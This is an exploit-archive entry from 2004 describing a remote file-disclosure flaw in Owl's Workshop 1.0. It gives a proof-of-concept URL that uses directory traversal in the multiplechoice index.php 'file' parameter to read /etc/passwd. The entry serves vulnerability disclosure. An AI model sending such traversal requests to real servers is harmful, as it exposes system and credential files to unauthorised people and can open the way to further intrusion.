Fools Workshop Owls Workshop 1.0 - multiplechoiceindex.php Arbitrary File Access

2004-02-18T00:00:00
ID EXPLOITPACK:BBC54AE0AB8DB74BFB7B46CA2B465F2E
Type exploitpack
Reporter G00db0y
Modified 2004-02-18T00:00:00

Description

Fools Workshop Owls Workshop 1.0 - multiplechoiceindex.php Arbitrary File Access

                                        
                                            source: https://www.securityfocus.com/bid/9689/info

Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. 

Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print